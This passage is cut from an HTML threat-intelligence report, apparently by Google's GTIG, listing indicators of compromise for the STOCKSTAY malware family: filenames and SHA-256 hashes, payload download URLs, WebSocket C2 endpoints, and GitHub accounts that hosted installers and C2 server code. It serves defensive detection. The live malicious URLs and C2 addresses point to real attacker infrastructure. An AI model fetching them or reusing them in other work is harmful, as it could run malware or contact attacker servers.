&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;STOCKSTAY.MARKETMAKER downloader&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;626330d22f77d9cbca9d40cc06568041703f194610c4c5a84bbb05a2e4ee7459&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;EditorToolsPdf.zip&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;ZIP archive containing STOCKSTAY components&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;447f430b46fad5a3f8e8c5aad1f8f7f79af069489c3d9c29224bb9f14f0c7bf4&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;ViewPdf.exe&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;STOCKSTAY.STOCKMARKET orchestrator&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;45bb8d1ab2c13bf4354294e13d3c9be15de625d807301905b98462f43f93e893&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;ClientMNGR.exe&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;STOCKSTAY.STOCKBROKER tunneler&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;80f6c010fd260d0bcf18a4b6a8d62505adbed50d2e615ed9522c4bfd61c00661&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;ConverterDDSNet.exe&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;STOCKSTAY.STOCKTRADER backdoor&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;55249f296b63a8bcf911b8bc96de43c1ac2b4a56c150a19d33d892a47e57352c&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;fonts&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;STOCKSTAY configuration file&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;e3364ee21cae6725451e8bc9ab9933df0000fd19814170bd132da68d1906d5ff&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;p style="text-align: center;"&gt;&lt;span style="color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;"&gt;&lt;span style="vertical-align: baseline;"&gt;Table 15: File indicators&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;/div&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;div align="left"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;&lt;table&gt;&lt;colgroup&gt;&lt;col /&gt;&lt;col /&gt;&lt;/colgroup&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Indicator&lt;/strong&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Description&lt;/strong&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;https://basecon.com.ua/calculator.rar&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;RAR archive containing HTA lure and STOCKSTAY.MARKETMAKER downloader&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;https://online.zp.ua/wp-content/uploads/Tools/EditorToolsPdf.zip&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Compromised WordPress infrastructure hosting STOCKSTAY ZIP archive&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;wss://canal1zac1a.onrender.com/ws&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;STOCKSTAY WebSocket C2&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;p style="text-align: center;"&gt;&lt;span style="color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;"&gt;&lt;span style="vertical-align: baseline;"&gt;Table 16: Network indicators&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;/div&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h4&gt;&lt;span style="vertical-align: baseline;"&gt;July 23 – 28, 2025: Actor Uses GitHub to Host STOCKSTAY MSI Files&lt;/span&gt;&lt;/h4&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;GTIG identified a GitHub account we suspect of being used by the threat actor to test or deploy STOCKSTAY. The GitHub account, &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;Roberto1983-ai&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;, was created on July &lt;span style="vertical-align: baseline;"&gt;23,&lt;/span&gt; 2025 at 12:01:03. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;On July &lt;span style="vertical-align: baseline;"&gt;24,&lt;/span&gt; 2025, the account created a public repository named &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;msi_installer_test2&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;, into which a single file was uploaded: &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;DiplomacyEduAI.msi&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;. A second repository, this time named &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;msi_installer_test3&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;, was created by the same user on July 28, 2025, and subsequently populated with another version of &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;DiplomacyEduAI.msi&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Both versions of &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;DiplomacyEduAI.msi&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; contained core STOCKSTAY components, alongside a configuration file containing the WebSocket C2 URL &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;wss://canal1zac1a.onrender.com/ws&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;. GTIG has been unable to identify any active operations using these specific MSI files.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;div align="left"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;&lt;table&gt;&lt;colgroup&gt;&lt;col /&gt;&lt;col /&gt;&lt;col /&gt;&lt;/colgroup&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Filename&lt;/strong&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Description&lt;/strong&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;SHA-256&lt;/strong&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;DiplomacyEduAI.msi&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;MSI containing STOCKSTAY components&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;19e6ed42248f9d03beb343a7c09a864dcd3cd671c29e1e5eac93579225224ac9&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;DiplomacyEduAI.msi&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;MSI containing STOCKSTAY components&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;6298f3150ad94a242e649886d47c59c634a4d04b9af5ee15e3bf335c40b5e58e&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;ClientMNGR.exe&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;STOCKSTAY.STOCKBROKER tunneler&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;80f6c010fd260d0bcf18a4b6a8d62505adbed50d2e615ed9522c4bfd61c00661&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;ViewPdf.exe&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;STOCKSTAY.STOCKMARKET orchestrator&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;45bb8d1ab2c13bf4354294e13d3c9be15de625d807301905b98462f43f93e893&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;ConverterDDSNet.exe&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;STOCKSTAY.STOCKTRADER backdoor&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;d8fe8f3fe838d5b1a1043096f6f6bb6f524f5f1b0c9f83a081078a824daa0cf3&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;fonts&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;STOCKSTAY configuration file&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;4e3bed10a8eff3e9205c1f37f647512464271d5ac65df7ae4709735621a38320&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;p style="text-align: center;"&gt;&lt;span style="color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;"&gt;&lt;span style="vertical-align: baseline;"&gt;Table 17: File indicators&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;/div&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;div align="left"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;&lt;table border="1px" cellpadding="16px" style="border-collapse: collapse; width: 100%;"&gt;&lt;colgroup&gt;&lt;col /&gt;&lt;col /&gt;&lt;/colgroup&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Indicator&lt;/strong&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Description&lt;/strong&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;wss://canal1zac1a.onrender.com/ws&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;STOCKSTAY WebSocket C2&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;p style="text-align: center;"&gt;&lt;span style="color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;"&gt;&lt;span style="vertical-align: baseline;"&gt;Table 18: Network indicators&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;/div&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h4&gt;&lt;span style="vertical-align: baseline;"&gt;August 14, 2025: Actor Uses GitHub to Host STOCKSTAY Server Code&lt;/span&gt;&lt;/h4&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;GTIG identified a second GitHub account, which was observed hosting what we assess to be server-side code for handling STOCKSTAY C2 communications. The GitHub account, &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;ChikenFresh&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;, was created on August 14, 2025, then almost immediately created a public repository named &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;google-ai-labs-it&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;, into which the suspected C2 controller code was uploaded. Our analysis of the C2 controller is included in the malware analysis section earlier in this report.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The GitHub repository name corresponds with a STOCKSTAY C2 server identified running on the Render platform, however GTIG has not observed any active operations using this infrastructure. We assess that the threat actor linked this GitHub repository to their Render account in order to utilize their &lt;/span&gt;&lt;a href="https://render.com/docs/websocket" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;WebSocket hosting&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; capabilities.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;div align="left"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;&lt;table&gt;&lt;colgroup&gt;&lt;col /&gt;&lt;col /&gt;&lt;col /&gt;&lt;/colgroup&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Filename&lt;/strong&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Description&lt;/strong&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;SHA-256&lt;/strong&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;server.py&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Python STOCKSTAY C2 controller&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;f04f43b6f7c2d86109c495179b497f7fb45fd95816623de1b77900f71b4f99ed&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;models.py&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Database table definitions and models for use by &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;server.py&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; &lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;7615140f78d9a0ce31cc9fe8c54c60028a7439cb32526fd97b10afef7145dd78&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;wtools.py&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Utility functions for use by &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;server.py&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;b55f3b8a7334af049ba3f70a9ad3fe78574b1e180c68baf9a7110d104387a636&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;p style="text-align: center;"&gt;&lt;span style="color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;"&gt;&lt;span style="vertical-align: baseline;"&gt;Table 19: File indicators&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;/div&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;div align="left"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;&lt;table border="1px" cellpadding="16px" style="border-collapse: collapse; width: 100%;"&gt;&lt;colgroup&gt;&lt;col /&gt;&lt;col /&gt;&lt;/colgroup&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Indicator&lt;/strong&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Description&lt;/strong&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;wss://google-ai-labs-it.onrender.com/ws&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;STOCKSTAY WebSocket C2&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
